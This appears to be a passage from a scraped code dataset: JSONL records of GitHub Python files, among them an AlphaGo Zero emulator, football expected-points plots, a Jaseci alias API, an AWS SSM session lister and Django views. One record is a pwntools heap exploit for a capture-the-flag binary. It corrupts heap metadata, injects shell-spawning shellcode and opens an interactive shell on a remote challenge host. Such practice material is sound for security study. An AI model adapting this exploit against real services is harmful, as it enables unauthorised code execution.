'__main__':\n#\"/home/nianheng/Desktop/problem/0/\"\n rootpath = '/home/nianheng/Documents/hiwi/10october/SWG/results_without_namefolder/'\n outpath = \"/home/nianheng/Documents/hiwi/11november/\"\n file_list = read_sentences(rootpath)\n\n df = np.array([['sentences', 'event', 'cues', 'outcomes(variant)', 'filename']])\n\n for each_file_name in file_list:\n file_path = rootpath + each_file_name\n try:\n file_textgrid_obj = textgrid.TextGrid.fromFile(file_path)\n a_sentence = Sentences()\n a_sentence.read_from_textgrid(file_textgrid_obj)\n create_event(a_sentence, each_file_name)\n df_np = create_cues(a_sentence,df, each_file_name)\n df = pd.DataFrame(df_np, columns=['sentences', 'event', 'cues', 'outcomes(variant)', 
'filename'])\n except UnicodeDecodeError:\n print(each_file_name + ': the encode is weird, not utf-8 or ansi')\n df.to_csv(outpath + \"first_try.csv\", sep=\",\")","repo_name":"RealNicolasBourbaki/KEC","sub_path":"try_morpho_tagger/CreateNPLTrainingSet.py","file_name":"CreateNPLTrainingSet.py","file_ext":"py","file_size_in_byte":10205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25481139757","text":"from agent import Agent\nfrom threading import Thread\nfrom utilities import TimeLogger, heatmap\nfrom time import time\n\n\n\nclass Emulation:\n\t\"\"\"Server for MDP emulation\"\"\"\n\tTIMER = TimeLogger()\n\tdef __init__(self, \n\t\t\t\t MDP_class, \n\t\t\t\t n_tree_nodes, \n\t\t\t\t n_sampling_moves, \n\t\t\t\t n_threads, \n\t\t\t\t n_moves, \n\t\t\t\t replay_buffer=None, \n\t\t\t\t temperatur=1, \n\t\t\t\t **kwargs):\n\t\tself.replay_buffer = replay_buffer\n\t\tself.MDP_class = MDP_class\n\t\tself.n_tree_nodes = n_tree_nodes\n\t\tself.n_sampling_moves = n_sampling_moves\n\t\tself.n_threads = n_threads\n\t\tself.n_moves = n_moves\n\t\tself.temperatur = temperatur\n\t\tself.Z_AVRG = 0\n\t\tself.Z = 0\n\t\tself.N = 0\n\t\tself.eta = 0.03\n\n\n\t@TIMER.log\n\tdef play(self, link, seed):\n\t\ttrajectory = []\n\t\tMDP = self.MDP_class()\n\t\tagent = Agent(MDP_class=self.MDP_class, \n\t\t\t\t\t state=MDP.S, \n\t\t\t\t\t n_sammpling_moves=self.n_sampling_moves, \n\t\t\t\t\t link=link, \n\t\t\t\t\t n_threads=self.n_threads, \n\t\t\t\t\t temperatur=self.temperatur, \n\t\t\t\t\t seed=seed + int(time()))\n\t\tVs, X = [], MDP.S.X\n\t\tfor t in range(self.n_moves):\n\t\t\tPI, A = agent(self.n_tree_nodes)\n\t\t\tVs.append(agent.mcts.root.V)\n\t\t\ttrajectory.append((X, PI))\n\t\t\tX, terminal = MDP(A)\n\t\t\tif terminal: break\n\t\tZ = MDP.evaluate()\n\t\ttrajectory = [(X, PI, Z*((-1)**i)) for i, (X, PI) in enumerate(trajectory[:-1])]\n\t\tX, PI, Z_end = trajectory[-1]\n\t\tV_end = Vs[-2]\n\t\tself.Z_AVRG = (1 - self.eta) * self.Z_AVRG + self.eta * Z\n\t\tprint(f\"\"\"{MDP.S}\nBLACK VICTORIES: {round(self.Z_AVRG, 3)}\nLEN OF THE GAME: {len(trajectory)}\n{'BLACKS' if Z == 1 else 'WHITES'} VICTORY\nEVALUATION ERROR: {round(Z_end + V_end, 2)}\"\"\")\n\t\tself.replay_buffer.extend(trajectory[:-3])\n\n\n\tdef eval(self, link, PID, score, phase='alpha'):\n\t\tflag = True\n\t\twhile True:\n\t\t\t# START GAME\n\t\t\tMDP = self.MDP_class()\n\t\t\talpha_agent = Agent(MDP_class=self.MDP_class, \n\t\t\t\t\t\t\t\tstate=MDP.S, \n\t\t\t\t\t\t\t\tn_sammpling_moves=self.n_sampling_moves, \n\t\t\t\t\t\t\t\tlink=link, \n\t\t\t\t\t\t\t\tn_threads=self.n_threads, \n\t\t\t\t\t\t\t\ttemperatur=self.temperatur,\n\t\t\t\t\t\t\t\tseed=(int(time()) + PID),\n\t\t\t\t\t\t\t\tverbose=(PID == 0))\n\t\t\t\n\t\t\tbeta_agent = Agent(MDP_class=self.MDP_class, \n\t\t\t\t\t\t\t state=MDP.S, \n\t\t\t\t\t\t\t n_sammpling_moves=self.n_sampling_moves, \n\t\t\t\t\t\t\t link=link, \n\t\t\t\t\t\t\t n_threads=self.n_threads, \n\t\t\t\t\t\t\t temperatur=self.temperatur, \n\t\t\t\t\t\t\t seed=(int(time()) - PID),\n\t\t\t\t\t\t\t randomize=False,\n\t\t\t\t\t\t\t verbose=(PID == 0))\n\t\t\t\n\t\t\talpha_pass = 0\n\t\t\tbeta_pass = 0\n\t\t\twhile True:\n\t\t\t\tPI, A = alpha_agent(self.n_tree_nodes)\n\t\t\t\tbeta_agent.mcts.forward(A)\n\t\t\t\tX, terminal = MDP(A)\n\t\t\t\tif A is None:\n\t\t\t\t\talpha_pass += 1\n\t\t\t\tif terminal: break\n\n\t\t\t\tPI, A = beta_agent(self.n_tree_nodes)\n\t\t\t\talpha_agent.mcts.forward(A)\n\t\t\t\tX, terminal = MDP(A)\n\t\t\t\tif A is 
None:\n\t\t\t\t\tbeta_pass += 1\n\t\t\t\tif terminal: break\n\n\t\t\t# CREATE TRAJECTORY\n\t\t\tprint(MDP.S, alpha_pass, beta_pass)\n\t\t\tZ = MDP.evaluate()\n\t\t\tif flag:\n\t\t\t\tscore.append(Z)\n\t\t\t\tflag = False\n\t\t\t\n\n\n\tdef run(self, *args, **kwargs):\n\t\targs = args\n\t\tkwargs = kwargs\n\t\twhile True:\n\t\t\tself.play(*args, **kwargs)\n\n","repo_name":"mortimervonchappuis/AlphaGoZero","sub_path":"emulation.py","file_name":"emulation.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"756324926","text":"#coding:utf-8\nimport sys\nfrom pwn import *\ncontext.log_level='debug'\ncontext.arch='amd64'\nwhile True :\n\t# try :\n\t\tif len(sys.argv)==1 :\n\t\t\tio=process('./mimic_heap')\n\t\t\t# io=process(['./'],env={'LD_PRELOAD':'./'})\n\t\t\telf=ELF('./mimic_heap')\n\t\t\tlibc1=ELF('./libc-2.27.so')\n\t\t\tlibc2=ELF('./libc-2.23.so')\n\t\t\t# libc2 = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')\n\t\t\tone_gadget = [0x4f2c5,0x4f322,0x10a38c]\n\t\telse :\n\t\t\tio=remote('nc.eonew.cn',10009)\n\t\t\telf=ELF('./mimic_heap')\n\t\t\tlibc1=ELF('./libc-2.27.so')\n\t\t\tlibc2=ELF('./libc-2.23.so')\n\t\t\t# ld = ELF('/lib/x86_64-linux-gnu/ld-2.27.so')\n\t\t\tone_gadget = [0x4f2c5,0x4f322,0x10a38c]\n\n\t\tdef add(a,b):\n\t\t\tio.sendlineafter('Your choice:','1')\n\t\t\tio.sendlineafter('The size: ',str(a))\n\t\t\tio.sendafter('Content: ',b)\n\n\t\tdef edit(a,b):\n\t\t\tio.sendlineafter('Your choice:','3')\n\t\t\tio.sendlineafter('want to modify:',str(a))\n\t\t\tio.sendafter('Content: ',b)\n\n\t\tdef show(a):\n\t\t\tio.sendlineafter('Your choice:','4')\n\t\t\tio.sendlineafter('want to see: ',str(a))\n\n\t\tdef delete(a):\n\t\t\tio.sendlineafter('Your choice:','2')\n\t\t\tio.sendlineafter('u want to delete: ',str(a))\n\n\n\t\tadd(0xa0,'aaaa')\n\t\tdelete(0)\n\t\tadd(0x40,'aaaa')\n\t\tadd(0x40,'aaaa')\n\t\tadd(0x48,'aaaa')\n\t\tfor i in range(8):\n\t\t\tadd(0xf8,'aaaa')\n\t\tfor i in range (7):\n\t\t\tdelete(i+4)\n\n\t\tptr=0xabc028\n\t\tfd=ptr-0x18\n\t\tbk=ptr-0x10\n\t\tedit(2,p64(0)+p64(0x41)+p64(fd)+p64(bk)+'\\x00'*0x20+p64(0x40))\n\t\tadd(0x20,'aaaa')\n\t\tdelete(3)\n\t\tpay=[\n\t\t0x1000,0xabc000\n\t\t]\n\t\tedit(2,flat(pay))\n\t\tpay=[\n\t\t0,0x101,\n\t\t0,0,\n\t\t0x100,0xabc010,\n\t\t0x100,0xabc010,\n\t\t0x100,0xabc000\n\t\t]\n\t\tedit(1,flat(pay).ljust(0x100,'\\x00')+p64(0)+p64(0x21)+p64(0)+p64(0x21)+p64(0)+p64(0xab1)+asm(shellcraft.sh()))\n\t\tdelete(2)\n\t\tshell_addr=0xabc130\n\t\tedit(3,p64(0x100))\n\t\tedit(1,'\\x00'*0x10+p64(shell_addr)+'\\x00'*0x18+p64(shell_addr))\n\n\t\t# if heap_base&0xfff == 0 :\n\t\t# \tlibc=libc2\n\t\t# else:\n\t\t# \tlibc=libc1\n\t\t# pay=[\n\t\t# heap_base+0xc0\n\t\t# ]\n\t\t# edit(1,flat(pay)+'\\x90')\n\t\t# show(0)\n\t\t# io.recvuntil('Content: \\n')\n\t\t# libc_base=(u64(io.recv(6)+'\\x00\\x00')-libc.sym['__malloc_hook']-88-0x10)&0xffffffffffff000\n\t\t# libc.address=libc_base\n\t\t# bin_sh_addr=libc.search('/bin/sh\\x00').next()\n\t\t# system_addr=libc.sym['system']\n\t\t# pay=[\n\t\t# libc.sym['__free_hook'],\n\t\t# ]\n\t\t# edit(1,flat(pay)+'\\x90')\n\t\t# edit(0,p64(system_addr))\n\t\t# add(0x20,'/bin/sh\\x00')\n\t\t# delete(3)\n\n\n\n\t\t# success('heap_base:'+hex(heap_base))\n\t\t# success('libc_base:'+hex(libc_base))\n\t\t# gdb.attach(io)\n\t\t# pause()\n\t\tio.interactive()\n\n\t# except Exception as e:\n\t# \tio.close()\n\t# \tcontinue\n\t# else:\n\t# 
\tcontinue","repo_name":"ilovekeer/Buuoj-Pwn","sub_path":"pwn_challage/mimic_heap/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"68"} +{"seq_id":"1106377257","text":"'''Make a 3-d graph relating expected points to distance and first down'''\r\n\r\nimport numpy as n\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport pickle\r\n\r\nmainModel = pickle.load(open(\"mainmodel.dat\",\"rb\"))\r\nnormalModel = pickle.load(open(\"normalmodel.dat\",\"rb\"))\r\nfourthModel = pickle.load(open(\"4thmodel.dat\",\"rb\"))\r\nKOModel = pickle.load(open(\"KOModel.dat\",\"rb\"))\r\nclutchModel = pickle.load(open(\"final5.dat\",\"rb\"))\r\ngtgModel = pickle.load(open(\"gtgmodel.dat\",\"rb\"))\r\ndecisionModel = pickle.load(open(\"4thChoiceModel.dat\",\"rb\"))\r\n\r\n#this function exists so that the main function can be on top where it belongs\r\ndef runThings():\r\n plotEP()\r\n #plotEP(down=n.random.randint(1,5),sd=n.random.randint(-17,18),time=n.random.randint(0,1801),half=2,scoreType=-7)\r\n #plotDecisions(time=900,sd=0)\r\n \r\n#wasn't expecting this to end up being recursive but it makes sense, \r\n#i guess, with teams kicking back and forth until time runs out\r\ndef EP(probArray, time, sd):\r\n MTTS = 261 #mean time to score, determined through averaging the time to next score of all events with a next score that half\r\n kickoffAdjustment = 0 if time <= 0 else EP(KOModel.predict_proba([[35, time - MTTS, sd]])[0], time - MTTS, sd)\r\n return ((probArray[6] - probArray[0]) * (6.97 - kickoffAdjustment) + #our TD prob minus their TD prob, multiplied by TD value (6.97 accounting for average conversion score)\r\n (probArray[5] - probArray[1]) * (3 - kickoffAdjustment) + #same but for FGs\r\n (probArray[4] - probArray[2]) * (2 + kickoffAdjustment)) #you receive the KO after a safety so add the KO adjustment\r\n \r\ndef GTGProbArray(down, dist, time, sd, underThree):\r\n output = list(gtgModel.predict_proba([[down, dist, time, sd, underThree]])[0])\r\n output.append(0)\r\n output[3:7] = output[2:6]\r\n mainModel.predict_proba([[down, dist, dist, time, sd, 1, underThree]])[0][2] #get safety against probs from main model\r\n output = n.array(output)\r\n output /= n.sum(output) #normalize so probs add up to 1.0\r\n return output\r\n\r\nscoreMap = {-7:(0, \"TD Against\"),-3:(1,\"FG Against\"),-2:(2,\"Safety Conceded\"),0:(3,\"Scoreless Rest of Half\"),+2:(4,\"Safety For\"),+3:(5,\"FG by offense\"),+7:(6,\"TD by offense\")}\r\ncolours = [\"viridis\", \"Wistia\",\"cool\",\"spring\",\"summer\",\"gnuplot\",\"plasma\"]\r\n \r\n#selects the correct model and returns the expected point value for a play with the given parameters, or a certain scoring probability\r\n#(does not include kickoff-type plays)\r\ndef EPFunc(down, toGoal, toFirst, time, sd, gtg, underThree, half=1, scoreType=\"EP\"):\r\n if (scoreType == \"EP\"):\r\n if ((half == 2) and (time <= 300)):\r\n return EP(clutchModel.predict_proba([[down, min(toFirst, toGoal), toGoal, time, sd, int(gtg), int(underThree)]])[0],time,sd) \r\n elif (gtg): \r\n output = GTGProbArray(down, toGoal, time, sd, underThree)\r\n return EP(output, time, sd)\r\n elif (down == 4):\r\n return EP(fourthModel.predict_proba([[toGoal, toFirst, time, int(toGoal <= 37), sd]])[0],time,sd) \r\n else: \r\n return EP(normalModel.predict_proba([[down,min(toFirst,toGoal),toGoal,time,sd,int(underThree)]])[0],time,sd)\r\n else: \r\n if 
(scoreType not in scoreMap):\r\n raise ValueError(\"Improper Score Type Provided\")\r\n if ((half == 2) and (time <= 300)):\r\n return clutchModel.predict_proba([[down, min(toFirst, toGoal), toGoal, time, sd, int(gtg), int(underThree)]])[0][scoreMap[scoreType][0]]\r\n elif (gtg): \r\n return GTGProbArray(down, toGoal, time, sd, underThree)[scoreMap[scoreType][0]]\r\n elif (down == 4):\r\n return fourthModel.predict_proba([[toGoal, toFirst, time, int(toGoal <= 37), sd]])[0][scoreMap[scoreType][0]]\r\n else: \r\n return normalModel.predict_proba([[down,min(toFirst,toGoal),toGoal,time,sd,int(underThree)]])[0][scoreMap[scoreType][0]]\r\n \r\n \r\ndef plotEP(down=1, sd=0, time=1200, half=1, scoreType=\"EP\"):\r\n z = n.zeros((100, 100)) # Initialize z with zeros. the first array axis is yardsToFirst, and the second is yardsToGoal\r\n x = n.linspace(1,100,num=100)\r\n y = n.linspace(1,25,num=100)\r\n x,y = n.meshgrid(x,y)\r\n for yardsToGoal in range(100):\r\n for yardsToFirst in range(100):\r\n index = yardsToFirst\r\n yardsToFirst = (yardsToFirst * (25/100) + 1)\r\n z[index][yardsToGoal] = EPFunc(down, yardsToGoal+1, min(yardsToFirst, yardsToGoal+1), time, sd, (yardsToFirst >= yardsToGoal), (time < 180),half,scoreType=scoreType)\r\n figure = plt.figure()\r\n axes = figure.add_subplot(projection=\"3d\")\r\n axes.plot_surface(x,y,z,cmap=colours[n.random.randint(len(colours))],rcount=100,ccount=100)\r\n axes.set(xlabel=\"Yards To Opponent's End Zone\",ylabel=\"Yards to First Down\",zlabel=\"Expected Points\",\r\n title=(\"EP by Field Position and Distance to First Down, Possession team \" + (\"winning\" if sd >= 0 else \"losing\")\r\n + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in half \" + str(half) + \" on down #\" + str(down)),zlim=(-3,7),ylim=(0,25),xlim=(0,100))\r\n if (scoreType != \"EP\"):\r\n axes.set(zlabel=scoreMap[scoreType][1] + \"Probability\",\r\n title=\"Probability of \" + scoreMap[scoreType][1] + \", Possession Team \" + (\"winning\" if sd >= 0 else \"losing\") + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in half \" + str(half) + \" on down #\" + str(down))\r\n if (scoreType != \"EP\"):\r\n biggest = max(max(z[0]),max(z[99])) \r\n #highest peak on either extreme end of the graph. 
\r\n #while some points may technically be higher, this is good enough\r\n axes.set(zlim=(0,biggest * 1.2 if (biggest <= 0.5) else 1))\r\n plt.subplots_adjust(top=0.97,right=1,left=0.0,bottom=0.0)\r\n plt.show()\r\ndef plotDecisions(sd=0,time=1200):\r\n goForIt = n.zeros((100, 100)) #the first array axis is yardsToFirst, and the second is yardsToGoal\r\n kickFG = n.zeros((100,100))\r\n punt = n.zeros((100,100))\r\n x = n.linspace(1,100,num=100)\r\n y = n.linspace(1,25,num=100)\r\n x,y = n.meshgrid(x,y)\r\n for yardsToGoal in range(100):\r\n for yardsToFirst in range(100):\r\n index = yardsToFirst\r\n yardsToFirst = (yardsToFirst / 4)\r\n punt[index][yardsToGoal], kickFG[index,yardsToGoal],goForIt[index][yardsToGoal] = decisionModel.predict_proba([[yardsToGoal, min(yardsToFirst, yardsToGoal),time, int(yardsToGoal <= 40), sd]])[0]\r\n #sets the value of all three arrays in the same command\r\n \r\n #make goForIt graph \r\n figure = plt.figure()\r\n axes = figure.add_subplot(projection=\"3d\")\r\n axes.plot_surface(x,y,goForIt,cmap=\"cool\",rcount=100,ccount=100,label=\"Go for it Probability\")\r\n axes.set(xlabel=\"Yards To Opponent's End Zone\",ylabel=\"Yards to First Down\",zlabel=\"Probabilities\",\r\n title=(\"Probability of a team Going for it on 4th down, Possession team \" + (\"winning\" if sd >= 0 else \"losing\")\r\n + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in the half\"),zlim=(0,1),ylim=(0,25),xlim=(0,100))\r\n plt.subplots_adjust(top=0.97,right=1,left=0,bottom=0)\r\n plt.show()\r\n \r\n #make field goal graph\r\n figure = plt.figure()\r\n axes = figure.add_subplot(projection=\"3d\")\r\n axes.plot_surface(x,y,kickFG,cmap=\"winter\",rcount=100,ccount=100,label=\"Field Goal Probability\")\r\n axes.set(xlabel=\"Yards To Opponent's End Zone\",ylabel=\"Yards to First Down\",zlabel=\"Probabilities\",\r\n title=(\"Probability of a team attempting a FG on 4th down, Possession team \" + (\"winning\" if sd >= 0 else \"losing\")\r\n + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in the half\"),zlim=(0,1),ylim=(0,25),xlim=(0,100))\r\n plt.subplots_adjust(top=0.97,right=1,left=0,bottom=0)\r\n plt.show()\r\n\r\n figure = plt.figure()\r\n axes = figure.add_subplot(projection=\"3d\")\r\n axes.plot_surface(x,y,punt,cmap=\"Wistia\",rcount=100,ccount=100,label=\"Punt Probability\")\r\n axes.set(xlabel=\"Yards To Opponent's End Zone\",ylabel=\"Yards to First Down\",zlabel=\"Probabilities\",\r\n title=(\"Probability of a team punting on 4th down, Possession team \" + (\"winning\" if sd >= 0 else \"losing\")\r\n + \" by \" + str(abs(sd)) + \" with \" + str(time) + \" seconds remaining in the half\"),zlim=(0,1),ylim=(0,25),xlim=(0,100))\r\n plt.subplots_adjust(top=0.97,right=1,left=0,bottom=0)\r\n plt.show()\r\nrunThings()","repo_name":"RougeGod/SportsModelling","sub_path":"Football/3DVisualizations.py","file_name":"3DVisualizations.py","file_ext":"py","file_size_in_byte":8495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"69924726298","text":"\"\"\"\nAlias api as a mixin\n\"\"\"\nfrom jaseci.extens.api.interface import Interface\n\n\nclass AliasAPI:\n \"\"\"\n Alias APIs for creating nicknames for UUIDs and other long strings\n\n The alias set of APIs provide a set of `alias' management functions for\n creating and managing aliases for long strings such as UUIDs. If an alias'\n name is used as a parameter value in any API call, that parameter will see\n the alias' value instead. 
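The parameter substitution described in this docstring can be pictured in a few lines of plain Python (an illustrative sketch of the behaviour only, not the Jaseci implementation; the names are made up):

    def resolve(params, alias_map):
        # any parameter value that matches a registered alias name is swapped for its value
        return {k: alias_map.get(v, v) for k, v in params.items()}

    print(resolve({'snt': 'sentinel:app'}, {'sentinel:app': 'urn:uuid:1234'}))
    # {'snt': 'urn:uuid:1234'}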
Given that references to all sentinels, walkers,\n nodes, etc. utilize UUIDs, it becomes quite useful to create mnemonic\n names for them. Also, when registering sentinels, walkers, and architypes,\n handy aliases are automatically generated. These generated aliases can\n then be managed using the alias APIs. Keep in mind that whenever an alias\n is created, all parameter values submitted to any API with the alias name\n will be replaced internally by its value. If you get in a bind, simply use\n the clear or delete alias APIs.\n \"\"\"\n\n def __init__(self):\n self.alias_map = {}\n\n @Interface.private_api(cli_args=[\"name\"])\n def alias_register(self, name: str, value: str):\n \"\"\"Create string to string alias mapping that caller can use.\n\n Either create a new alias string to string mapping or replace\n an existing mapping of a given alias name. Once registered the\n alias mapping is instantly active.\n\n Args:\n name (str): The name for the alias created by caller.\n value (str): The value for that name to map to (i.e., UUID)\n\n Returns:\n json: Fields include\n 'response': Message of mapping that was created\n \"\"\"\n self.alias_map[name] = value\n self.save()\n return {\"response\": f\"Alias from '{name}' to '{value}' set!\"}\n\n @Interface.private_api()\n def alias_list(self):\n \"\"\"List all string to string aliases that the caller can use.\n\n Returns dictionary object of name to value mappings currently active.\n This API is quite useful to track not only the aliases the caller\n creates, but also the aliases automatically created as various Jaseci\n objects (walkers, architypes, sentinels, etc.) are created, changed,\n or destroyed.\n\n Returns:\n dictionary: Dictionary of active mappings\n 'name': 'value'\n ...\n \"\"\"\n return self.alias_map\n\n @Interface.private_api(cli_args=[\"name\"])\n def alias_delete(self, name: str):\n \"\"\"Delete an active string to string alias mapping.\n\n Removes a specific alias by its name. Only the alias is removed; no\n actual objects are affected. Future uses of this name will not be\n mapped.\n\n Args:\n name (str): The name for the alias to be removed from caller.\n\n Returns:\n dictionary: Fields include\n 'response': Message of success/failure to remove alias\n 'success': True/False based on delete actually happening\n \"\"\"\n if name in self.alias_map.keys():\n del self.alias_map[name]\n self.save()\n return {\"response\": f\"Alias {name} successfully deleted\", \"success\": True}\n else:\n return {\"response\": f\"Alias {name} not present\", \"success\": False}\n\n @Interface.private_api()\n def alias_clear(self):\n \"\"\"Remove all string to string aliases that the client can use.\n\n Removes all aliases. No actual objects are affected. 
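For reference, the extract_* helpers further below register keys with a fixed shape; for a sentinel named 'app' with a walker 'init' (illustrative names, following the f-string patterns in the code):

    # 'sentinel:app'      -> snt.jid
    # 'app:walker:init'   -> arch.jid   (arch.kind == 'walker')
    # 'app:architype:foo' -> arch.jid   (any other kind)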
Aliases will\n continue to be automatically generated when creating other Jaseci\n objects.\n\n Returns:\n dictionary: Fields include\n 'response': Message of number of aliases removed\n 'removed': Number of aliases removed\n \"\"\"\n n = len(self.alias_map.keys())\n self.alias_map = {}\n self.save()\n return {\"response\": f\"All {n} aliases deleted\", \"removed\": n}\n\n def extract_snt_aliases(self, snt):\n \"\"\"\n Extract and register all aliases from sentinel\n \"\"\"\n self.alias_register(f\"sentinel:{snt.name}\", snt.jid)\n for i in snt.arch_ids.obj_list():\n self.extract_arch_aliases(snt, i)\n self.save()\n\n def extract_arch_aliases(self, snt, arch):\n \"\"\"\n Extract and register all aliases from architype\n \"\"\"\n if arch.kind == \"walker\":\n self.alias_register(f\"{snt.name}:walker:{arch.name}\", arch.jid)\n else:\n self.alias_register(f\"{snt.name}:architype:{arch.name}\", arch.jid)\n\n def remove_snt_aliases(self, snt):\n \"\"\"\n Remove all registered aliases for a sentinel\n \"\"\"\n self.alias_delete(f\"sentinel:{snt.name}\")\n for i in snt.arch_ids.obj_list():\n self.remove_arch_aliases(snt, i)\n self.save()\n\n def remove_arch_aliases(self, snt, arch):\n \"\"\"\n Remove all registered aliases for an architype\n \"\"\"\n if arch.kind == \"walker\":\n self.alias_delete(f\"{snt.name}:walker:{arch.name}\")\n else:\n self.alias_delete(f\"{snt.name}:architype:{arch.name}\")\n","repo_name":"Jaseci-Labs/jaseci","sub_path":"jaseci_core/jaseci/extens/api/alias_api.py","file_name":"alias_api.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"68"} +{"seq_id":"15823098190","text":"import boto3\r\nimport json\r\n\r\nimport botocore\r\n# import operator\r\nregions = ['af-south-1', 'eu-north-1', 'ap-south-1', 'eu-west-3', 'eu-west-2', 'eu-south-1', 'eu-west-1', 'ap-northeast-3', 'ap-northeast-2', 'me-south-1', 'ap-northeast-1', 'sa-east-1', 'ca-central-1', 'ap-east-1', 'ap-southeast-1', 'ap-southeast-2', 'eu-central-1', 'us-east-1', 'us-east-2', 'us-west-1', 'us-west-2']\r\nfor j in regions:\r\n try:\r\n print(\"Here are all the ssm sessions from \"+ j +\" region\")\r\n print(\"..................................................................................................\")\r\n\r\n\r\n ssm_client = boto3.client('ssm', region_name = j )\r\n list_ssm = []\r\n next_token = None\r\n while True:\r\n response2 = ssm_client.describe_sessions(State='Active',\r\n NextToken= next_token\r\n ) if next_token else ssm_client.describe_sessions(State='Active')\r\n print(response2['Sessions']) \r\n for l in response2['Sessions']:\r\n \r\n \r\n status_var2 = l['Status']\r\n \r\n rank = 0\r\n if status_var2 == \"Connected\":\r\n rank = 1\r\n if status_var2 == \"Failed\":\r\n rank = 2\r\n\r\n list_ssm.append((l['SessionId'], \"Sessions\" , \"No Document name\",l['Status'], rank))\r\n \r\n\r\n\r\n print(list_ssm)\r\n \r\n if 'NextToken' in response2.keys():\r\n next_token = response2['NextToken']\r\n \r\n else:\r\n break\r\n\r\n except Exception as e:\r\n print(\"Exception occurred\")\r\n print(e)\r\n continue\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"saima-noor/my_projects","sub_path":"SSM resources/describe_ssm_sessions.py","file_name":"describe_ssm_sessions.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"69903101018","text":"from django.shortcuts import render, redirect\n# from django.contrib.auth.forms 
import UserCreationForm\nfrom .forms import UserRegisterForm, ProfileImageForm, UserUpdateForm\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\n\ndef register(request):\n error = ''\n if request.method == \"POST\":\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'User {username} was created successfully!')\n return redirect('home')\n else:\n error = \"The form was filled in incorrectly\"\n\n form = UserRegisterForm()\n\n data = {\n 'title': 'Registration page',\n 'form': form,\n \"error\": error,\n }\n\n return render(request, 'users/registration.html', data)\n\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n profileForm = ProfileImageForm(request.POST, request.FILES, instance=request.user.profile)\n updateUserForm = UserUpdateForm(request.POST, instance=request.user)\n \n if profileForm.is_valid() and updateUserForm.is_valid():\n updateUserForm.save()\n profileForm.save()\n messages.success(request, 'Profile updated successfully!')\n return redirect('profile')\n else:\n profileForm = ProfileImageForm(instance=request.user.profile)\n updateUserForm = UserUpdateForm(instance=request.user)\n\n data = {\n 'profileForm': profileForm,\n 'updateUserForm': updateUserForm\n }\n\n return render(request, 'users/profile.html', data)\n\n\n# Create your views here.\n","repo_name":"pesnyuspoyom/facetook","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8196622822","text":"from pathlib import Path\n\nwith open(\"RNU6_269P.txt\", \"r\") as f:\n header = next(f)\n\nprint(header)\n\nfilename = \"RNU6_269P.txt\"\nfile = Path(filename)\ndata = file.read_text()\n\nline = data.split('\\n')\n\nprint(line[0])","repo_name":"Carol-mza/2019-2020-PNE-Practices","sub_path":"Session 04/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6148314129","text":"TIC = 'btc'\r\n\r\nTURBULENCE_FACTOR = 1.2\r\nTIMESTEPS = 10000 # ~ 500 timesteps per second | 3600 seconds in an hour\r\nPPI = 137.68\r\n\r\nCOLOUR_LIST = [ \r\n \"lightcoral\",\r\n \"lightskyblue\",\r\n \"lightskyblue\",\r\n \"sandybrown\",\r\n \"limegreen\",\r\n \"deepskyblue\",\r\n \"plum\",\r\n \"turquoise\",\r\n \"crimson\",\r\n \"mediumpurple\",\r\n \"hotpink\"\r\n]\r\n\r\nSINGLE_TI = [\"macd\", \"rsi_30\", \"cci_30\", \"dx_30\", \"adx\", \"obv\"]\r\nPASS_LIST = [\"boll_ub\", \"boll_lb\", \"close_30_sma\"]\r\n\r\nMODEL_LIST = [\"a2c\", \"ppo\"] # [\"ddpg\", \"td3\", \"sac\"]\r\n\r\nSTART_DATE = \"2014-06-01\"\r\nEND_DATE = \"2020-05-30\"\r\n\r\nSTART_TRADE_DATE = \"2019-06-01\"\r\n\r\n# Stockstats list\r\nTECHNICAL_INDICATORS_LIST = [\r\n \"macd\",\r\n \"boll_ub\",\r\n \"boll_lb\",\r\n \"rsi_30\",\r\n \"cci_30\",\r\n \"dx_30\",\r\n \"close_30_sma\",\r\n \"close_60_sma\",\r\n \"adx\",\r\n]\r\n\r\n# My TI list\r\nTI_LIST = [\r\n \"macd\",\r\n \"boll_ub\",\r\n \"boll_lb\",\r\n \"rsi_30\",\r\n \"cci_30\",\r\n \"dx_30\",\r\n \"close_30_sma\",\r\n \"close_60_sma\",\r\n \"adx\",\r\n \"psar\",\r\n 
